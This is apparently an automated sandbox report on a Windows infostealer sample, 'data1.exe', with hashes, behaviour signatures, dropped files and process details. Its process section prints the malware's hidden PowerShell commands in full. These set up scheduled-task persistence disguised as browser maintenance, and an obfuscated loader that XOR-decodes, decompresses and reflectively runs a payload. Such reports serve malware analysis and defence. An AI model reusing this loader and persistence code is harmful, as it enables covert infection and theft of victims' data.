Analysis

  • max time kernel
    137s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    12/10/2023, 04:44

General

  • Target

    data1.exe

  • Size

    26KB

  • MD5

    c7efa0a867ddb94500488ce06340a698

  • SHA1

    de915803ab8c02e3f8bb3306ca3c1a17cecb1fb1

  • SHA256

    1c1ef5f2c13da4e6399a1d1b4600dfc474c3a74447fdff219f0df449e4da908c

  • SHA512

    9ca3c189a6c86c65a3bf58faaa3d881338a3a57c5c1ebe2b3b5956bf463f9aaf61505145802e9bc6a2c03962e92780eabd7a7f8de62cf427317c4212f6a851c7

  • SSDEEP

    384:0UjR1b5SoBLh9ir0R5FYec717ubmjkC38ZlW/souo/SuUGD:H1oePZYp76W0ouYSuUG

Malware Config

Signatures

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\data1.exe
    "C:\Users\Admin\AppData\Local\Temp\data1.exe"
    1⤵
    • Adds Run key to start application
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1764
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c $taskName = 'ChromeMaint';$taskExe = 'C:\Users\Admin\AppData\Local\taskum.exe';$taskarg = 'C:\Users\Admin\AppData\Local\Chrome.bat';$taskWD = 'C:\Users\Admin\AppData\Local\Pac';$taskExists = Get-ScheduledTask | Where-Object {$_.TaskName -like $taskName };$A = New-ScheduledTaskAction -Execute $taskExe -WorkingDirectory $taskWD -Argument $taskarg;if($taskExists) {Set-ScheduledTask -TaskName $taskName -Action $A;} else {$T = New-ScheduledTaskTrigger -AtLogOn -User ($env:USERNAME);$S = New-ScheduledTaskSettingsSet -StartWhenAvailable -Hidden -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0;$D = New-ScheduledTask -Action $A -Trigger $T -Settings $S;Register-ScheduledTask -TaskName $taskName -InputObject $D;}
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2776
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c $taskName = 'FireFoxMaint';$taskExe = 'C:\Users\Admin\AppData\Local\taskUnity\task.exe';$taskarg = '\"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe\" \"-w\" \"hidden\" \"-c\" \"$Cxkl=''FlCxklXuCxklXsCxklXh''.Replace(''CxklX'', '''');$XWpH=''WCxklXriCxklXtCxklXe''.Replace(''CxklX'', '''');$Ebst=''RCxklXeCxklXaCxklXd''.Replace(''CxklX'', '''');$AjKr=''LCxklXoCxklXaCxklXd''.Replace(''CxklX'', '''');$nAlz=''RCxklXeaCxklXdCxklXACxklXllCxklXTCxklXexCxklXt''.Replace(''CxklX'', '''');$rkwq=''EnCxklXtCxklXryCxklXPoCxklXinCxklXt''.Replace(''CxklX'', '''');$ywGh=''InCxklXvCxklXokCxklXe''.Replace(''CxklX'', '''');$rrKG=''FrCxklXomCxklXBaCxklXseCxklX64CxklXSCxklXtrCxklXing''.Replace(''CxklX'', '''');function cSUex($kGFsz){$SjAZa=New-Object System.IO.MemoryStream(,$kGFsz);$zIanR=New-Object System.IO.MemoryStream;$vRvnd=New-Object System.IO.Compression.GZipStream($SjAZa,[IO.Compression.CompressionMode]::Decompress);$hRgEv = New-Object System.IO.BinaryWriter($zIanR);$bRTaW = New-Object byte[](1024);while($true){$FgteA = $vRvnd.$Ebst($bRTaW,0,1024);if($FgteA -le 0){break;}$hRgEv.$XWpH($bRTaW,0,$FgteA);$hRgEv.$Cxkl();}$vRvnd.Dispose();$SjAZa.Dispose();$hRgEv.Close();$zIanR.Dispose();$zIanR.ToArray();}function JeGso($kGFsz){$PzChi=[System.Convert]::$rrKG(''hkguTzSCb75g7sJ9ChMcmAOPpeBL9ZJy/tejnoCjT+E='');For ($i=0; $i -lt $kGFsz.Length; $i++){$ix = $i % $PzChi.Length;$kGFsz[$i] = $kGFsz[$i] -bxor $PzChi[$ix];}$kGFsz;}$YjPOO = cSUex(JeGso([Convert]::$rrKG([System.IO.File]::$nAlz(''C:\Users\Admin\AppData\Local\Pac\data1.txt''))));[System.Reflection.Assembly]::$AjKr([byte[]]$YjPOO).$rkwq.$ywGh($null,$null);\"';$taskWD = 'C:\Users\Admin\AppData\Local\Pac';$taskExists = Get-ScheduledTask | Where-Object {$_.TaskName -like $taskName };$A = New-ScheduledTaskAction -Execute $taskExe -WorkingDirectory $taskWD -Argument $taskarg;if($taskExists) {Set-ScheduledTask -TaskName $taskName -Action $A;} else {$T = New-ScheduledTaskTrigger -AtLogOn -User ($env:USERNAME);$S = New-ScheduledTaskSettingsSet -StartWhenAvailable -Hidden -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0;$D = New-ScheduledTask -Action $A -Trigger $T -Settings $S;Register-ScheduledTask -TaskName $taskName -InputObject $D;}
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2744
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c $taskName = 'CFoxMaint';$taskExe = 'C:\Users\Admin\AppData\Local\taskUnity\task.exe';$taskarg = '\"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe\" \"-w\" \"hidden\" \"-c\" \"$uSJv=''FluSJvLuuSJvLsuSJvLh''.Replace(''uSJvL'', '''');$Lbbi=''WuSJvLriuSJvLtuSJvLe''.Replace(''uSJvL'', '''');$wDvd=''RuSJvLeuSJvLauSJvLd''.Replace(''uSJvL'', '''');$QYkK=''LuSJvLouSJvLauSJvLd''.Replace(''uSJvL'', '''');$DQGp=''RuSJvLeauSJvLduSJvLAuSJvLlluSJvLTuSJvLexuSJvLt''.Replace(''uSJvL'', '''');$rUYC=''EnuSJvLtuSJvLryuSJvLPouSJvLinuSJvLt''.Replace(''uSJvL'', '''');$WdAx=''InuSJvLvuSJvLokuSJvLe''.Replace(''uSJvL'', '''');$yvmD=''FruSJvLomuSJvLBauSJvLseuSJvL64uSJvLSuSJvLtruSJvLing''.Replace(''uSJvL'', '''');function cSUex($kGFsz){$SjAZa=New-Object System.IO.MemoryStream(,$kGFsz);$zIanR=New-Object System.IO.MemoryStream;$vRvnd=New-Object System.IO.Compression.GZipStream($SjAZa,[IO.Compression.CompressionMode]::Decompress);$hRgEv = New-Object System.IO.BinaryWriter($zIanR);$bRTaW = New-Object byte[](1024);while($true){$FgteA = $vRvnd.$wDvd($bRTaW,0,1024);if($FgteA -le 0){break;}$hRgEv.$Lbbi($bRTaW,0,$FgteA);$hRgEv.$uSJv();}$vRvnd.Dispose();$SjAZa.Dispose();$hRgEv.Close();$zIanR.Dispose();$zIanR.ToArray();}function JeGso($kGFsz){$PzChi=[System.Convert]::$yvmD(''hkguTzSCb75g7sJ9ChMcmAOPpeBL9ZJy/tejnoCjT+E='');For ($i=0; $i -lt $kGFsz.Length; $i++){$ix = $i % $PzChi.Length;$kGFsz[$i] = $kGFsz[$i] -bxor $PzChi[$ix];}$kGFsz;}$YjPOO = cSUex(JeGso([Convert]::$yvmD([System.IO.File]::$DQGp(''C:\Users\Admin\AppData\Local\Pac\data2.txt''))));[System.Reflection.Assembly]::$QYkK([byte[]]$YjPOO).$rUYC.$WdAx($null,$null);\"';$taskWD = 'C:\Users\Admin\AppData\Local\Pac';$taskExists = Get-ScheduledTask | Where-Object {$_.TaskName -like $taskName };$A = New-ScheduledTaskAction -Execute $taskExe -WorkingDirectory $taskWD -Argument $taskarg;if($taskExists) {Set-ScheduledTask -TaskName $taskName -Action $A;} else {$T = New-ScheduledTaskTrigger -AtLogOn -User ($env:USERNAME);$S = New-ScheduledTaskSettingsSet -StartWhenAvailable -Hidden -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0;$D = New-ScheduledTask -Action $A -Trigger $T -Settings $S;Register-ScheduledTask -TaskName $taskName -InputObject $D;}
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2644

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    304B

    MD5

    6be68fdc644afe0ec09cc5870e768550

    SHA1

    995b8d545c882dde9ea0a90225d9d844dbe89aa5

    SHA256

    f84460e1a4d9daa961859d8d59af6ff66cf4c2f67e2c2aa63b44aa099692a4f6

    SHA512

    061cda51b1f9447e2e8234c395a22c81d2ad06ff1fe0c33b5f36deb1fce0b8e812680cd2f4e37d151923d60753c82c8f11b10a14a84d6ec2bc195a2358ca7772

  • C:\Users\Admin\AppData\Local\Temp\BlueFiles\Old\info.json

    Filesize

    2B

    MD5

    99914b932bd37a50b983c5e7c90ae93b

    SHA1

    bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

    SHA256

    44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

    SHA512

    27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

  • C:\Users\Admin\AppData\Local\Temp\Cab983C.tmp

    Filesize

    61KB

    MD5

    f3441b8572aae8801c04f3060b550443

    SHA1

    4ef0a35436125d6821831ef36c28ffaf196cda15

    SHA256

    6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

    SHA512

    5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

  • C:\Users\Admin\AppData\Local\Temp\Tar985E.tmp

    Filesize

    163KB

    MD5

    9441737383d21192400eca82fda910ec

    SHA1

    725e0d606a4fc9ba44aa8ffde65bed15e65367e4

    SHA256

    bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

    SHA512

    7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E4A9O39NPVSDXQTKNEFP.temp

    Filesize

    7KB

    MD5

    65bf0e144f12f05a9d5417757d5a71fe

    SHA1

    48d5695f7aeb313a08092f09145612fc6a21c4d3

    SHA256

    bf86e12c86345e5e701b51b4ce7a99ea3b944bc089a1def2d529f679c7ba8049

    SHA512

    9ca7f6bdb498029199733a1696c4b93f9961d8e44343437eef29aeceddf71073adba3b83ef2a0a8e9d859b50be5750680e865962d6cd7186c1f88bd9b11c788d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    65bf0e144f12f05a9d5417757d5a71fe

    SHA1

    48d5695f7aeb313a08092f09145612fc6a21c4d3

    SHA256

    bf86e12c86345e5e701b51b4ce7a99ea3b944bc089a1def2d529f679c7ba8049

    SHA512

    9ca7f6bdb498029199733a1696c4b93f9961d8e44343437eef29aeceddf71073adba3b83ef2a0a8e9d859b50be5750680e865962d6cd7186c1f88bd9b11c788d

  • memory/1764-38-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

    Filesize

    9.9MB

  • memory/1764-1-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

    Filesize

    9.9MB

  • memory/1764-2-0x000000001AB20000-0x000000001ABA0000-memory.dmp

    Filesize

    512KB

  • memory/1764-9-0x000000001B150000-0x000000001B1F6000-memory.dmp

    Filesize

    664KB

  • memory/1764-12-0x00000000003C0000-0x00000000003CC000-memory.dmp

    Filesize

    48KB

  • memory/1764-0-0x00000000009B0000-0x00000000009BC000-memory.dmp

    Filesize

    48KB

  • memory/2644-24-0x0000000073E50000-0x00000000743FB000-memory.dmp

    Filesize

    5.7MB

  • memory/2644-27-0x00000000025B0000-0x00000000025F0000-memory.dmp

    Filesize

    256KB

  • memory/2644-150-0x00000000025B0000-0x00000000025F0000-memory.dmp

    Filesize

    256KB

  • memory/2644-148-0x00000000025B0000-0x00000000025F0000-memory.dmp

    Filesize

    256KB

  • memory/2644-34-0x00000000025B0000-0x00000000025F0000-memory.dmp

    Filesize

    256KB

  • memory/2644-146-0x0000000073E50000-0x00000000743FB000-memory.dmp

    Filesize

    5.7MB

  • memory/2644-32-0x00000000025B0000-0x00000000025F0000-memory.dmp

    Filesize

    256KB

  • memory/2644-29-0x0000000073E50000-0x00000000743FB000-memory.dmp

    Filesize

    5.7MB

  • memory/2744-33-0x0000000002730000-0x0000000002770000-memory.dmp

    Filesize

    256KB

  • memory/2744-37-0x0000000002730000-0x0000000002770000-memory.dmp

    Filesize

    256KB

  • memory/2744-28-0x0000000073E50000-0x00000000743FB000-memory.dmp

    Filesize

    5.7MB

  • memory/2744-36-0x0000000002730000-0x0000000002770000-memory.dmp

    Filesize

    256KB

  • memory/2744-152-0x0000000002730000-0x0000000002770000-memory.dmp

    Filesize

    256KB

  • memory/2744-151-0x0000000002730000-0x0000000002770000-memory.dmp

    Filesize

    256KB

  • memory/2744-23-0x0000000073E50000-0x00000000743FB000-memory.dmp

    Filesize

    5.7MB

  • memory/2744-145-0x0000000073E50000-0x00000000743FB000-memory.dmp

    Filesize

    5.7MB

  • memory/2776-31-0x00000000027A0000-0x00000000027E0000-memory.dmp

    Filesize

    256KB

  • memory/2776-147-0x0000000073E50000-0x00000000743FB000-memory.dmp

    Filesize

    5.7MB

  • memory/2776-35-0x00000000027A0000-0x00000000027E0000-memory.dmp

    Filesize

    256KB

  • memory/2776-149-0x00000000027A0000-0x00000000027E0000-memory.dmp

    Filesize

    256KB

  • memory/2776-30-0x0000000073E50000-0x00000000743FB000-memory.dmp

    Filesize

    5.7MB

  • memory/2776-25-0x0000000073E50000-0x00000000743FB000-memory.dmp

    Filesize

    5.7MB

  • memory/2776-26-0x00000000027A0000-0x00000000027E0000-memory.dmp

    Filesize

    256KB